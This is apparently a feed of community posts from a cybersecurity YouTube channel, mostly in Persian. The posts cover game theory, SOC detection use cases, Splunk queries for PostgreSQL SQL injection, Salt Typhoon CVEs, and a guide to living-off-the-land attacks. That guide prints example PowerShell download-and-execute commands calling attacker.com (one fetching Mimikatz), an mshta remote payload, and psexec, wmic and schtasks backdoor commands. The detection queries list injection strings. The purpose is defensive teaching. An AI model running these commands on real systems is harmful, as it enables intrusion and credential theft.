The Elentiya Effect

Welcome to The Elentiya Effect — where #cybersecurity meets Strategy, Game Theory, and Leadership Thinking.

In this channel, we go beyond technical defense. We analyze cyber threats like a strategist, break down real-world #attacks , and teach you how to think like a hacker — but act like a leader.

Every week, we bring you podcasts, deep dives, and practical insights on: ⚔️ Game Theory in Cybersecurity
🎯 Cyber #deception & #defense #strategies
🔍 #soc #Operations & Threat Detection
📊 #risk Management & Decision-Making
🚀 #leadership & Strategic Thinking in Cyber Defense

If you want to understand how attackers think and how defenders can win the game, subscribe to The Elentiya Effect and join the community of strategic cyber defenders.

This is not another cybersecurity channel. This is the strategic lens you’ve been missing.



The Elentiya Effect

**آنچه بسیاری از تحلیلگران را از آینده جا می‌گذارد، کمبود اطلاعات نیست؛ کمبود مدل ذهنی است.**

در گفت‌وگوی اخیر پروفسور **Jiang Xueqin**، بیش از آنکه خودِ پیش‌بینی‌ها برایم جالب باشد، **روش رسیدن به آن‌ها** توجه مرا جلب کرد.

بیشتر تحلیلگران اخبار را دنبال می‌کنند.

اما او به دنبال **Anomaly** می‌گردد؛
رویدادی که با منطق رایج سازگار نیست.

او ترور قاسم سلیمانی را صرفاً یک عملیات نظامی نمی‌بیند؛ بلکه آن را حرکتی می‌داند که قواعد معمول تعامل میان بازیگران را بر هم زده است. از نگاه او، چنین ناهنجاری‌هایی نشانه تغییر در استراتژی کلان بازی هستند، نه صرفاً یک رخداد خبری.

این دقیقاً همان چیزی است که نظریه بازی‌ها به ما آموزش می‌دهد:

**وقتی یکی از بازیکنان حرکتی انجام می‌دهد که در مدل قبلی منطقی نیست، احتمالاً مدل شما اشتباه است؛ نه حرکت او.**

به همین دلیل، تحلیل راهبردی با جمع‌آوری خبر تفاوت دارد.

تحلیل راهبردی یعنی پاسخ دادن به چند سؤال:

* بازیکنان اصلی چه کسانی هستند؟
* تابع مطلوبیت هر کدام چیست؟
* چه محدودیت‌هایی دارند؟
* چه گزینه‌هایی روی میز است؟
* و مهم‌تر از همه...
* کدام حرکت، قواعد بازی را تغییر می‌دهد؟

در بسیاری از موارد، آینده را نمی‌توان از روی اخبار پیش‌بینی کرد.

اما می‌توان آن را از روی **تغییر ساختار بازی** پیش‌بینی کرد.

به همین دلیل است که امروز نظریه بازی‌ها دیگر فقط متعلق به اقتصاد نیست.

از امنیت سایبری گرفته تا ژئوپلیتیک، هوش مصنوعی، سیاست‌گذاری، مذاکره و حتی مدیریت سازمانی، همه به سمت یک سؤال مشترک حرکت کرده‌اند:

**"بازیکن بعدی، با توجه به انگیزه‌ها و محدودیت‌هایش، منطقی‌ترین حرکتش چیست؟"**

به اعتقاد من، ارزش واقعی نظریه بازی‌ها در پیدا کردن پاسخ نیست؛

بلکه در **پرسیدن سؤال‌های درست** است.

وقتی سؤال درست باشد، حتی پیش از آنکه آینده رخ دهد، می‌توان مسیر احتمالی آن را دید.

#GameTheory #Geopolitics #Strategy #CyberSecurity #DecisionMaking #RiskManagement #TheElentiyaEffect

#Jiang #GameTheory

2 months ago | [YT] | 0

The Elentiya Effect

🚨 Fraud Detection in 200 Milliseconds: Multi-Model AI Under the Elentiya Lens 🚨

Every financial transaction is a race against time. In less than 200 milliseconds, banks and payment systems must decide: Is this transaction legitimate or fraudulent?

Humans can’t react that fast. Traditional systems often miss the subtle tricks. That’s why AI is the backbone of modern fraud detection.

🔹 First generation: Predictive Machine Learning
Fast, reliable, and explainable. It catches anomalies like “impossible travel” between countries. But it fails when fraudsters disguise themselves with creative, text-based tricks.

🔹 Second generation: Language Models (LLMs)
Smarter and context-aware. They read descriptions, detect urgency, spot fake merchant names, and sense psychological manipulation. But they’re slower and demand heavy resources.

🔹 The breakthrough: Multi-Model AI
By combining speed of predictive ML with the depth of LLMs, banks can approve safe transactions instantly, block high-risk ones, and send suspicious cases for deeper AI or human review. The result? Speed + accuracy in one system.

But fraud detection isn’t just about algorithms — it’s a strategic game.

Fraudsters test the system with new tactics.

Banks defend, balancing performance and cost.

Regulators set the rules of the game.

Customers’ behavior creates the signals that models must learn from.

Through the Elentiya Effect, this becomes a multi-player game of strategy, trust, and adaptation. The winners are those who combine technology, policy, and human insight into one unified defense.

💡 Fraud detection in 200 milliseconds is more than technology.
It’s AI + Game Theory + Ethics.
It’s how we protect assets, reduce false positives, and build long-term trust.

⚡ The future of fraud detection isn’t about choosing between speed or intelligence. It’s about embracing multi-model AI — because only together can we keep up with the game.
www.linkedin.com/feed/update/urn:li:activity:73682…


#AI #FraudDetection #Fintech #GameTheory #ElentiyaEffect #MachineLearning #Security

1 year ago | [YT] | 1

The Elentiya Effect

۱. سناریو:

Silk Typhoon، Volt Typhoon و Salt Typhoon از پیشرفته‌ترین گروه‌های APT (Advanced Persistent Threat) هستن که در حال اجرای حملات مخفیانه، کم‌سر و صدا و بسیار پیچیده روی سازمان‌ها هستن.
این گروه‌ها به روش‌های مختلف عمل می‌کنن:

✅ Silk Typhoon (Hafnium) – متخصص دسترسی اولیه و سرقت اطلاعات از محیط‌های ابری و شبکه‌های خصوصی
✅ Volt Typhoon – متخصص حملات سایبری علیه زیرساخت‌های حیاتی، پنهان‌کاری و فعالیت‌های بدون فایل (Living-off-the-Land)
✅ Salt Typhoon – متخصص حملات سایبری علیه سازمان‌های مالی و دولتی، استفاده از بدافزارهای سفارشی و مهندسی اجتماعی پیشرفته

۲. معیارهای شناسایی:

✅ فعالیت غیرمعمول روی Remote Management Tools (RDP, SSH, AnyDesk, TeamViewer)
✅ استفاده از پروتکل‌های مدیریتی مثل WinRM و WMI برای حرکت جانبی
✅ تغییرات در PowerShell Execution Policy
✅ افزایش اتصالات DNS غیرعادی به سرورهای خارجی
✅ ارسال ناگهانی حجم زیادی از داده‌ها به خارج از شبکه
۳. منابع داده:

📌 لاگ‌های احراز هویت (Active Directory, VPN, MFA, SSO)
📌 لاگ‌های اجرای اسکریپت (PowerShell, Bash, Windows Event Logs)
📌 لاگ‌های شبکه و DNS (Firewall, Proxy, IDS/IPS, DNS Logs)
📌 مانیتورینگ حساب‌های کاربری و لاگین‌های غیرعادی
۴. شرایط و فیلترها:

🔍 اگر حساب کاربری‌ای که قبلاً از ابزارهای مدیریتی استفاده نکرده، ناگهان شروع به استفاده از WinRM یا SSH کرد
🔍 اگر PowerShell بدون مجوز اجرا شد و متصل به یک دامنه ناشناس شد
🔍 اگر سیستم‌های مهم سازمانی شروع به ارسال داده به سرورهای خارجی کردن
🔍 اگر یک کاربر در کمتر از ۲۴ ساعت از چند لوکیشن مختلف وارد شد
۵. پاسخ و اقدامات:

🚨 قرنطینه سیستم‌های آلوده و بررسی لاگ‌های اخیر
🚨 محدود کردن حساب‌های مشکوک و بررسی تاریخچه ورودها
🚨 توقف فعالیت‌های مشکوک PowerShell# و WMI در سطح شبکه
🚨 بلاک کردن آی‌پی‌ها و دامنه‌های مشکوک مرتبط با این گروه‌ها


Silk Typhoon# روی دسترسی اولیه به سیستم‌های ابری تمرکز داره
Volt Typhoon# متخصص حرکت جانبی بدون ایجاد فایل و حمله به زیرساخت‌های حیاتی هست
Salt Typhoon# متخصص حملات سایبری علیه سیستم‌های مالی و دولتی هست

1 year ago | [YT] | 2

The Elentiya Effect

🚨 ۲.۱ یوزکیس تشخیص حذف اجباری UBlock Origin# و تغییرات در مرورگر
۱. #سناریو :

در آخرین آپدیت کروم، UBlock Origin غیرفعال شده و مرورگر به کاربران پیشنهاد می‌کنه این افزونه رو حذف کنن. مهاجمان ممکنه از این فرصت استفاده کنن و از طریق سیاست‌های مرورگر یا اسکریپت‌های مخرب، کنترل افزونه‌ها را در اختیار بگیرن.
۲. معیارهای شناسایی:

✅ تغییر در #رجیستری ویندوز یا تنظیمات کروم
✅ اجرای Chrome# با آرگومان‌های مشکوک (--disable-extensions)
✅ ارتباط‌های مشکوک با سرورهای گوگل برای تغییر سیاست‌های افزونه
۳. منابع داده:

📌 لاگ‌های سیستم‌عامل (Windows #Event Logs, #Sysmon#)
📌 لاگ‌های مرورگر (Chrome, #Edge, #Firefox Logs)
📌 ترافیک شبکه ( Proxy Logs, #DNS Logs, #Firewall Logs)
۴. شرایط و فیلترها:

🔍 اگر تغییر در مسیر HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions شناسایی شد
🔍 اگر پروسه chrome.exe یا msedge.exe با --disable-extensions اجرا شد
🔍 اگر ارتباط‌های DNS به clients2.google.com افزایش یافت
۵. پاسخ و اقدامات:

🚨 ارسال هشدار به تیم امنیت
🚨 بررسی دستگاه و مسدود کردن تغییرات غیرمجاز
🚨 اعمال سیاست‌های سخت‌گیرانه‌تر روی مرورگرها
🔥 ۲.۲ یوزکیس تشخیص سوءاستفاده از Kibana از طریق Prototype Pollution
۱. سناریو:

مهاجم از آسیب‌پذیری Prototype Pollution در Kibana سوءاستفاده می‌کنه تا به داده‌ها دسترسی بگیره یا کد مخرب اجرا کنه.
۲. معیارهای شناسایی:

✅ درخواست‌های غیرعادی POST به /api/saved_objects
✅ درخواست‌هایی که شامل __proto__ یا constructor.prototype در Payload هستن
✅ تغییر ناگهانی در سطح دسترسی کاربران Kibana
۳. منابع داده:

📌 لاگ‌های وب‌سرور Kibana
📌 لاگ‌های درخواست‌های API (ElasticSearch & Kibana Audit Logs)
۴. شرایط و فیلترها:

🔍 اگر __proto__ در یک درخواست POST مشاهده شد
🔍 اگر کاربری با نقش "Viewer" عملیاتی انجام داد که قبلاً اجازه نداشت
۵. پاسخ و اقدامات:

🚨 هشدار فوری به تیم امنیتی
🚨 مسدود کردن دسترسی از آی‌پی‌های مشکوک
🚨 بررسی دستورات اجرایی در سرور Kibana
📺 ۲.۳ یوزکیس تشخیص Android TV آلوده
۱. سناریو:

برخی از Android TVهای ارزان‌قیمت، از قبل آلوده به بدافزار هستن و ترافیک مشکوک به سمت C2 Server ارسال می‌کنن.
۲. معیارهای شناسایی:

✅ ارتباط غیرعادی با سرورهای تبلیغاتی
✅ ارسال درخواست‌های زیاد از یک دستگاه Android TV به آی‌پی‌های مشکوک
✅ تلاش برای دانلود فایل‌های مشکوک بدون تعامل کاربر
۳. منابع داده:

📌 لاگ‌های شبکه (Proxy, Firewall, DNS Logs)
📌 مانیتورینگ ترافیک IoT
۴. شرایط و فیلترها:

🔍 اگر دستگاه Android TV به بیش از ۵۰ دامنه تبلیغاتی در ۱۰ دقیقه متصل شد
🔍 اگر دستگاه در ساعات غیرعادی به سرورهای چینی یا ناشناس متصل شد
۵. پاسخ و اقدامات:

🚨 ارسال هشدار و مسدود کردن ترافیک مشکوک
🚨 بررسی دستی دستگاه‌های آلوده
🕵️ ۲.۴ یوزکیس تشخیص حملات APT در شبکه
۱. سناریو:

مهاجم از یک حساب دزدیده‌شده استفاده می‌کنه تا در محیط سازمان نفوذ کنه و بدون جلب توجه، اطلاعات سرقت کنه.
۲. معیارهای شناسایی:

✅ تلاش برای ورود از دو کشور مختلف در بازه زمانی کوتاه
✅ افزایش ناگهانی در تعداد دستورات PowerShell مشکوک
✅ دسترسی غیرعادی به فایل‌های حساس
۳. منابع داده:

📌 لاگ‌های احراز هویت (AD Logs, VPN Logs)
📌 لاگ‌های PowerShell و Bash Execution
۴. شرایط و فیلترها:

🔍 اگر یک کاربر در ۱۰ دقیقه از دو کشور مختلف لاگین کرد
🔍 اگر دستورات PowerShell مخرب مانند Invoke-WebRequest اجرا شد
۵. پاسخ و اقدامات:

🚨 غیرفعال کردن حساب مشکوک
🚨 بررسی دستگاهی که این ورودها از آن انجام شده

🔥 ۵. یوزکیس تشخیص سوءاستفاده از آسیب‌پذیری‌های لینوکس و VMware ESXi
۱. سناریو:

هکرها با استفاده از آسیب‌پذیری‌های اخیر کرنل لینوکس و VMware ESXi وارد سرورها میشن و از اونجا برای حرکت جانبی (Lateral Movement) استفاده می‌کنن.
۲. معیارهای شناسایی:

✅ اجرای دستورات sudo توسط کاربری که قبلاً مجوز نداشته است
✅ تغییرات در فایل‌های سیستمی حساس (/etc/passwd, /etc/shadow, /root/.ssh/authorized_keys)
✅ تلاش برای سوءاستفاده از آسیب‌پذیری‌های شناخته‌شده ESXi
۳. منابع داده:

📌 لاگ‌های auth.log در لینوکس
📌 لاگ‌های vmkernel.log در ESXi
📌 مانیتورینگ تغییرات در فایل‌های سیستمی
۴. شرایط و فیلترها:

🔍 اگر کاربری با سطح دسترسی عادی sudo اجرا کرد
🔍 اگر در /etc/shadow تغییر ناگهانی اتفاق افتاد
۵. پاسخ و اقدامات:

🚨 ارسال هشدار فوری
🚨 بررسی تاریخچه لاگین‌های SSH
🚨 اعمال محدودیت‌های امنیتی روی کاربر مشکوک
🏦 ۶. یوزکیس تشخیص حملات Jackpotting روی ATMها
۱. سناریو:

مهاجمان با نصب بدافزار روی ATMها، کنترل کامل بر روی برداشت وجه پیدا می‌کنن و ATM رو مجبور به پرداخت پول می‌کنن.
۲. معیارهای شناسایی:

✅ اجرای فایل‌های ناشناخته روی ATM
✅ برداشت وجه بدون احراز هویت
✅ ارتباط مشکوک ATM با سرورهای ناشناس
۳. منابع داده:

📌 لاگ‌های امنیتی ATM
📌 لاگ‌های شبکه بانکی
۴. شرایط و فیلترها:

🔍 اگر یک ATM در بازه زمانی غیرعادی تراکنش‌های زیاد انجام داد
🔍 اگر ATM به یک آدرس IP ناشناس در اینترنت متصل شد
۵. پاسخ و اقدامات:

🚨 هشدار فوری به مرکز SOC
🚨 مسدود کردن ATM مشکوک
🚨 ارسال تیم بررسی به محل فیزیکی ATM
🕵️‍♂️ ۷. یوزکیس تشخیص فعالیت گروه‌های هکری چینی (APT27 و i-Soon)
۱. سناریو:

وزارت دادگستری آمریکا اعلام کرده که گروه‌های چینی APT27 و i-Soon از سال ۲۰۱۱ در حال حمله به سازمان‌های دولتی و خصوصی هستن.
۲. معیارهای شناسایی:

✅ تلاش برای ورود غیرمجاز به ایمیل‌ها و سرورها
✅ بررسی ارتباطات با دامنه‌ها و آی‌پی‌های مرتبط با APT27
✅ افزایش غیرعادی در درخواست‌های VPN از کشورهای خاص
۳. منابع داده:

📌 لاگ‌های احراز هویت Active Directory
📌 لاگ‌های VPN و فایروال
۴. شرایط و فیلترها:

🔍 اگر یک کاربر در مدت کوتاه از چندین کشور تلاش به لاگین کرد
🔍 اگر ارتباطات با آی‌پی‌های مرتبط با APT27 افزایش یافت
۵. پاسخ و اقدامات:

🚨 مسدود کردن آی‌پی‌های مشکوک
🚨 بررسی حساب‌های کاربری که احتمال سرقت اطلاعات دارن
💀 ۸. یوزکیس تشخیص سوءاستفاده از PACER برای تحقیقات ضد جرائم سایبری
۱. سناریو:

گروه‌های هکری دارن از سیستم PACER (Public Access to Court Electronic Records) برای بررسی چگونگی باز شدن پرونده‌های جرایم سایبری استفاده می‌کنن.
۲. معیارهای شناسایی:

✅ دسترسی‌های غیرمعمول به اسناد حقوقی مرتبط با جرایم سایبری
✅ افزایش ناگهانی در درخواست‌های PACER از یک محدوده آی‌پی خاص
✅ تلاش برای استخراج اطلاعات پرونده‌های مرتبط با امنیت سایبری
۳. منابع داده:

📌 لاگ‌های دسترسی به PACER
📌 تحلیل درخواست‌های HTTP
۴. شرایط و فیلترها:

🔍 اگر از یک محدوده آی‌پی خاص تعداد زیادی درخواست PACER در یک بازه کوتاه ارسال شد
۵. پاسخ و اقدامات:

🚨 هشدار به تیم حقوقی و امنیتی
🚨 بررسی آی‌پی‌های مشکوک و مسدودسازی در صورت لزوم
🚀 ۹. یوزکیس تشخیص کلاهبرداری از طریق چت‌های متنی (AI Scam Detection)
۱. سناریو:

گوگل سیستم جدیدی برای تشخیص کلاهبرداری متنی معرفی کرده که از هوش مصنوعی برای شناسایی مکالمات مشکوک استفاده می‌کنه.
۲. معیارهای شناسایی:

✅ شناسایی پیام‌های تکراری و مشکوک در چت‌ها
✅ افزایش ناگهانی در گزارش‌های اسپم از کاربران
✅ ارسال پیام‌های خودکار بدون تعامل انسانی
۳. منابع داده:

📌 لاگ‌های پیامک و ارتباطات آنلاین
📌 گزارش‌های کاربران
۴. شرایط و فیلترها:

🔍 اگر یک شماره خاص در مدت کوتاه تعداد زیادی پیام مشابه ارسال کرد
۵. پاسخ و اقدامات:

🚨 مسدود کردن شماره مشکوک
🚨 هشدار به تیم‌های امنیتی برای بررسی
🔥 ۱۰. یوزکیس تشخیص حمله Hunters International به Tata Technologies
۱. سناریو:

گروه هکری Hunters International تهدید کرده که ۱.۴ ترابایت داده‌های مهندسی شرکت Tata Technologies رو منتشر می‌کنه.
۲. معیارهای شناسایی:

✅ بررسی تلاش‌های ورود غیرمجاز به سرورهای Tata
✅ بررسی ارسال داده‌های بزرگ به خارج از سازمان
✅ مانیتورینگ دامنه‌های شناخته‌شده مرتبط با Hunters International
۳. منابع داده:

📌 لاگ‌های سرورهای فایل و دیتابیس
📌 لاگ‌های شبکه برای تشخیص ارسال داده‌های غیرعادی
۴. شرایط و فیلترها:

🔍 اگر در ۲۴ ساعت گذشته بیش از ۵۰ گیگابایت داده به یک آی‌پی خارجی ارسال شد
۵. پاسخ و اقدامات:

🚨 مسدود کردن ارتباطات مشکوک
🚨 بررسی کاربرانی که حجم زیادی از داده‌ها رو منتقل کردن
🔥 ۱۱. یوزکیس تشخیص حملات فیشینگ پیشرفته علیه سازمان‌ها
۱. سناریو:

مهاجمان فیشینگ دارن حملات هدفمند (Spear Phishing) علیه کارکنان سازمان اجرا می‌کنن تا اعتبارنامه‌ها رو سرقت کنن. این حملات به روش‌های مختلف اجرا می‌شن، از جمله:

ایمیل‌های فیشینگ با لینک‌های مخرب
فایل‌های آلوده‌ی Office و PDF
وب‌سایت‌های جعلی (Clone Websites)

۲. معیارهای شناسایی:

✅ ورودهای مشکوک به حساب‌های ایمیل از کشورهای مختلف
✅ کلیک روی لینک‌های مخرب در ایمیل
✅ دانلود فایل‌های آلوده از دامنه‌های مشکوک
✅ لاگین‌های غیرمعمول بعد از دریافت ایمیل خاص
۳. منابع داده:

📌 لاگ‌های ایمیل سرور (Exchange, Gmail, O365 Logs)
📌 لاگ‌های احراز هویت (Active Directory, SSO Logs, VPN Logs)
📌 لاگ‌های ترافیک شبکه (Firewall, Proxy, IDS/IPS Logs)
۴. شرایط و فیلترها:

🔍 اگر یک کاربر بعد از دریافت ایمیل خاص در کمتر از ۵ دقیقه روی لینک کلیک کرد و وارد شد
🔍 اگر ورودهای حساب ایمیل از دو کشور مختلف در یک بازه زمانی کوتاه انجام شد
🔍 اگر یک دامنه جدید با نمره ریسک بالا (Threat Intelligence) در ایمیل وجود داشت
۵. پاسخ و اقدامات:

🚨 ارسال هشدار به تیم SOC
🚨 بررسی لینک‌های مخرب و مسدودسازی دامنه‌ها
🚨 ارسال هشدار به کاربر در صورت ورود غیرعادی
🔥 ۱۲. یوزکیس تشخیص نفوذهای استراتژیک توسط Silk Typhoon, Volt Typhoon و Salt Typhoon

1 year ago | [YT] | 1

The Elentiya Effect

🔍 #PostgreSQL SQL Injection Detection in #Splunk
✅ CVE-2025-1094 Detection with SPL Queries

This #vulnerability is related to improper escaping of parameters in libpq functions, which can lead to SQL injection attacks.
1️⃣ Detect Suspicious SQL Queries in PostgreSQL Logs

index=postgresql
sourcetype=postgresql_logs
"SELECT * FROM" OR "UNION SELECT" OR "1=1" OR "DROP TABLE" OR "INSERT INTO" OR "xp_cmdshell"
| rex field=_raw "(?<query>SELECT .* FROM.*|UNION SELECT.*|DROP TABLE.*|INSERT INTO.*|xp_cmdshell.*)"
| stats count by query, src, user
| where count > 5

🛠 Explanation:

Looks for common SQL injection patterns (SELECT *, UNION SELECT, DROP TABLE, etc.).
Filters logs from PostgreSQL (sourcetype=postgresql_logs).
Aggregates by source IP (src), user, and query.
Alerts if a single source/user executes more than 5 suspicious queries.

2️⃣ Detect Errors Related to SQL Injection Attempts

index=postgresql
sourcetype=postgresql_logs
"syntax error" OR "unterminated quoted string" OR "unexpected EOF" OR "error in query"
| stats count by user, src, query
| where count > 3

🛠 Explanation:

Identifies errors caused by malformed SQL queries often used in SQLi attempts.
Triggers if the same user/IP encounters more than 3 errors in a short period.

3️⃣ Detect Exploitation via Metasploit

index=postgresql
sourcetype=postgresql_logs
"pg_sleep" OR "pg_read_file" OR "pg_stat_activity"
| stats count by user, src, query
| where count > 2

🛠 Explanation:

Looks for PostgreSQL functions often used in SQLi exploits.
pg_sleep can be used for time-based SQL injection.
pg_read_file can exfiltrate database config.
pg_stat_activity can be used to list active queries for privilege escalation.

4️⃣ Detect Unusual Authentication Activity

index=postgresql
sourcetype=postgresql_logs
"authentication failed" OR "invalid password" OR "brute force detected"
| stats count by src, user
| where count > 10

🛠 Explanation:

Monitors for multiple failed logins, which might indicate an attacker trying different credentials after gaining SQLi access.

5️⃣ Identify Database User Privilege Escalation

index=postgresql
sourcetype=postgresql_logs
"ALTER ROLE" OR "GRANT ALL PRIVILEGES" OR "SET ROLE"
| stats count by user, src, query
| where count > 1

🛠 Explanation:

Detects attackers escalating privileges via SQLi by altering roles or granting admin access.

📌 Applicable Splunk Sourcetypes

Ensure your PostgreSQL logs are properly ingested into Splunk under one of these sourcetypes:

postgresql_logs
db_audit (if database auditing is enabled)
pgsql_audit (third-party PostgreSQL audit logging)
syslog (if PostgreSQL logs are forwarded via syslog)

🛡 Recommended #Mitigation Steps

🔹 Upgrade PostgreSQL to the latest patched version.
🔹 Enable database query logging to track unauthorized SQL commands.
🔹 Use parameterized queries to prevent SQLi vulnerabilities.
🔹 Set up alerts in Splunk for automated detection & response.

1 year ago | [YT] | 3

The Elentiya Effect

🔍 تکنیک‌های Living Off The Land (LOTL) در حملات سایبری – راهنمای کامل
📌 LOTL چیست و چرا خطرناک است؟

🔹 Living Off The Land (LOTL) به تکنیکی در حملات سایبری گفته می‌شود که مهاجمان به جای استفاده از بدافزارهای قابل شناسایی، از ابزارها، فایل‌ها و قابلیت‌های داخلی سیستم‌عامل و نرم‌افزارهای قانونی برای پیشبرد حمله استفاده می‌کنند.
🔹 هدف اصلی این تکنیک، پنهان ماندن از سیستم‌های امنیتی و EDR/XDR، عدم نیاز به دانلود بدافزار جدید و کاهش احتمال شناسایی توسط آنتی‌ویروس‌ها و SIEMها است.
🚨 چرا مهاجمان از تکنیک LOTL استفاده می‌کنند؟

✅ ۱. کاهش شناسایی توسط آنتی‌ویروس‌ها و EDRها – از ابزارهای داخلی سیستم استفاده می‌شود، بنابراین اجرای آن‌ها غیرمعمول به نظر نمی‌رسد.
✅ ۲. عدم نیاز به دانلود بدافزار جدید – با اجرای اسکریپت‌ها و ابزارهای از پیش نصب‌شده در سیستم قربانی، نیازی به دانلود کد مخرب نیست.
✅ ۳. افزایش ماندگاری در سیستم (Persistence) – از ویژگی‌های خود سیستم‌عامل برای ایجاد دسترسی پایدار استفاده می‌شود.
✅ ۴. حرکت جانبی در شبکه (Lateral Movement) – از ابزارهای داخلی مانند PowerShell برای اجرای دستورات در سایر سیستم‌های شبکه استفاده می‌شود.
📌 تکنیک‌های متداول LOTL و ابزارهای مورد استفاده
۱. استفاده از PowerShell برای اجرای حملات بدون فایل (Fileless Attacks)

PowerShell یکی از قدرتمندترین ابزارهای سیستم‌عامل ویندوز است که مهاجمان از آن برای اجرای کدهای مخرب، دانلود و اجرای اسکریپت‌ها، و سرقت اطلاعات استفاده می‌کنند.

🔍 مثال‌های حمله:
🔹 اجرای یک اسکریپت PowerShell برای استخراج داده‌های کاربری:

powershell -exec bypass -w hidden -noprofile -c "IEX (New-Object Net.WebClient).DownloadString('attacker.com/script.ps1')"

🔹 دانلود و اجرای ابزار Mimikatz برای سرقت اطلاعات احراز هویت:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('attacker.com/mimikatz.ps1')"

🔹 لاگ‌های مرتبط در SIEM برای شناسایی: 📂 sourcetype=win:eventlog
📂 sourcetype=win:security
📂 sourcetype=win:powershell
۲. استفاده از Windows Management Instrumentation (WMI) برای اجرای دستورات از راه دور

مهاجمان از WMI برای اجرای کد مخرب در سیستم‌های دیگر درون شبکه استفاده می‌کنند، بدون اینکه نیاز به اجرای بدافزار جدید داشته باشند.

🔍 مثال حمله:
🔹 اجرای یک اسکریپت از راه دور روی کامپیوترهای شبکه:

wmic /node:TargetPC process call create "cmd.exe /c malicious_script.bat"

🔹 لاگ‌های مرتبط در SIEM برای شناسایی: 📂 sourcetype=win:eventlog
📂 sourcetype=win:wmi
📂 sourcetype=win:security
۳. سوءاستفاده از PsExec برای اجرای کد روی سایر سیستم‌ها

PsExec یک ابزار مایکروسافت برای اجرای دستورات از راه دور است که مهاجمان برای اجرای بدافزار یا اسکریپت‌های مخرب روی سیستم‌های دیگر درون شبکه از آن استفاده می‌کنند.

🔍 مثال حمله:
🔹 مهاجم می‌تواند با استفاده از PsExec روی یک سرور دیگر در شبکه کد اجرا کند:

psexec \\targetPC -u admin -p password cmd.exe /c "malicious_script.bat"

🔹 لاگ‌های مرتبط در SIEM برای شناسایی: 📂 sourcetype=sysmon
📂 sourcetype=win:security
۴. استفاده از Scheduled Tasks برای ایجاد دسترسی پایدار

مهاجمان از Task Scheduler برای اجرای کد مخرب در فواصل زمانی مشخص و حفظ کنترل روی سیستم قربانی استفاده می‌کنند.

🔍 مثال حمله:
🔹 ایجاد یک تسک زمان‌بندی‌شده برای اجرای یک اسکریپت مخرب:

schtasks /create /tn "Backdoor" /tr "C:\Windows\System32\cmd.exe /c evil.exe" /sc minute /mo 1

🔹 لاگ‌های مرتبط در SIEM برای شناسایی: 📂 sourcetype=win:eventlog:scheduler
۵. استفاده از MSHTA برای اجرای کدهای مخرب

MSHTA.exe یک ابزار بومی ویندوز برای اجرای اسکریپت‌های HTML است که مهاجمان از آن برای اجرای کد مخرب بدون جلب توجه استفاده می‌کنند.

🔍 مثال حمله:
🔹 اجرای یک کد مخرب از راه دور:

mshta attacker.com/malicious.hta

🔹 لاگ‌های مرتبط در SIEM برای شناسایی: 📂 sourcetype=win:eventlog
🔍 روش‌های شناسایی حملات LOTL در SIEM و EDR

🚀 ۱. شناسایی اجرای غیرعادی ابزارهای ویندوز
🔹 اجرای غیرمنتظره PowerShell، WMI، PsExec، MSHTA و Task Scheduler

🚀 ۲. بررسی ورودهای غیرعادی (Unusual Logins)
🔹 نظارت بر ورودهای ناگهانی مدیران از موقعیت‌های جغرافیایی جدید

🚀 ۳. بررسی ارتباطات غیرعادی شبکه (Network Traffic Monitoring)
🔹 ارتباطات ناگهانی با آدرس‌های IP ناشناس

🚀 ۴. استفاده از تحلیل‌های رفتاری (User Behavior Analytics - UBA)
🔹 شناسایی رفتارهای غیرعادی کاربران مانند افزایش ناگهانی سطح دسترسی یا اجرای فرآیندهای غیرمعمول
🛡 راهکارهای جلوگیری از حملات LOTL

✅ ۱. محدود کردن اجرای PowerShell و WMI برای کاربران غیرمجاز
✅ ۲. غیرفعال کردن ابزارهای اجرایی مانند MSHTA، PsExec و Scheduled Tasks برای کاربران عادی
✅ ۳. نظارت مستمر بر لاگ‌های SIEM و استفاده از UBA برای شناسایی رفتارهای مشکوک
✅ ۴. اجرای سیاست‌های Zero Trust و حداقل سطح دسترسی (Least Privilege Access)
✅ ۵. استفاده از EDR پیشرفته با قابلیت تشخیص فعالیت‌های غیرعادی PowerShell و WMI
🚀 نتیجه‌گیری: چرا تکنیک‌های LOTL خطرناک هستند؟

⚠ تکنیک‌های LOTL به مهاجمان اجازه می‌دهند بدون نیاز به بدافزارهای سنتی، درون شبکه‌ی شما پنهان شوند.
⚠ بسیاری از آنتی‌ویروس‌ها و فایروال‌ها نمی‌توانند این حملات را تشخیص دهند.
⚠ استفاده از ابزارهای قانونی برای اجرای کد مخرب، تشخیص را برای تیم‌های امنیتی سخت‌تر می‌کند.

🎯 اما خبر خوب این است که اگر لاگ‌های SIEM را به‌درستی پیکربندی کنید و از تحلیل‌های رفتاری استفاده کنید، می‌توانید حملات LOTL را قبل از اینکه آسیب جدی وارد کنند، شناسایی کنید!

🔔 آیا فکر می‌کنید سازمان شما در برابر حملات LOTL آماده است؟ نظرات خود را در کامنت‌ها بنویسید!
🚀 اثر الانتیا را دنبال کنید تا از جدیدترین تهدیدات امنیت سایبری باخبر شوید! 🎙🔥

🔗 #امنیت_سایبری #SIEM #PowerShell #APT #LOTL #EDR #Splunk #ThreatHunting #TheElentiyaEffect 🚀

1 year ago | [YT] | 3

The Elentiya Effect

لیست کامل آسیب‌پذیری‌های استفاده‌شده در حمله‌ی Salt Typhoon + لاگ‌های مرتبط برای شناسایی در SIEM (Splunk, Elastic, QRadar)

حمله‌ی Salt Typhoon یکی از پیچیده‌ترین حملات سایبری در سال ۲۰۲۴ بود. این گروه APT از چندین آسیب‌پذیری روز صفر و شناخته‌شده استفاده کرد تا به زیرساخت‌های مخابراتی و شبکه‌های شرکتی نفوذ کند. در اینجا لیست CVEهای استفاده‌شده، لاگ‌های مرتبط و بهترین روش‌های شناسایی آورده شده است.
🚀 لیست CVEهای استفاده‌شده و نوع آسیب‌پذیری‌ها + لاگ‌های مرتبط

📌 ۱. Fortinet FortiOS & FortiProxy – CVE-2023-27997
✔ نوع آسیب‌پذیری: Heap-based Buffer Overflow
✔ امکان اجرای کد از راه دور (RCE) بدون احراز هویت
✔ بهره‌برداری از این آسیب‌پذیری برای دور زدن فایروال و ورود اولیه

🔍 لاگ‌های مرتبط در SIEM:
📂 sourcetype=fortinet
📂 sourcetype=fortinet:firewall
📂 sourcetype=fortinet:vpn
📌 بررسی تلاش‌های مشکوک برای ورود به فایروال و تغییرات غیرمجاز در تنظیمات

📌 ۲. Cisco IOS XE – CVE-2023-20198
✔ نوع آسیب‌پذیری: Privilege Escalation & Remote Code Execution
✔ ایجاد یک درب پشتی (backdoor) در Web UI
✔ دسترسی غیرمجاز به تنظیمات روترهای شرکت‌ها و تغییر در مسیرهای مسیریابی

